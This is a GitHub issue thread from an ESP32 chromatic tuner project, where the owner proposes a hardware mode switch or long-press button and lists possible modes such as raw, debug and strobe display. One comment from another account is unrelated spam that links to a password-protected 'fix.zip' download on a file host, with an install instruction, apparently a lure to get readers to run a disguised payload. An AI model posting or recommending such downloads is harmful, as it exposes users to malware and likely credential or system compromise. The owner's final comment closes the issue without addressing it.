### ISSUE TITLE
Add support for a mode button/switch

### ISSUE THREAD

**Issue by joulupukki** [joulupukki/esp32-chromatic-tuner#4]
The tuner should be able to support multiple "modes" of tuning. This is mostly for the UI.

Two ways to implement this from a hardware perspective:
1. Use a three-way switch that's hooked up to three different GPIO pins. Depending on the switches orientation the software could (at startup) use the specified mode.
2. Use a momentary button that would cycle through the different available modes. To prevent accidental press, this could be implemented as a long press mechanism

Some modes that could be nice:
1. Normal tuning mode (what we already have)
2. Raw mode: gives just basic frequency, note, and cents reading
3. Debug mode: continuously spits out info about voltage reading, intermediate values (after applying filters etc), frequency, cents, etc.
4. Additional UI modes in the future (like simulated strobe mode or just different UI layouts)

The code needs to be changed so that it can read the value of the switch at startup and/or during each loop. Also, to keep memory consumption low, UI elements for each mode (and processing) should be torn down as needed.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joulupukki** [comment]
Closing this one because we're going to implement it in a different way.
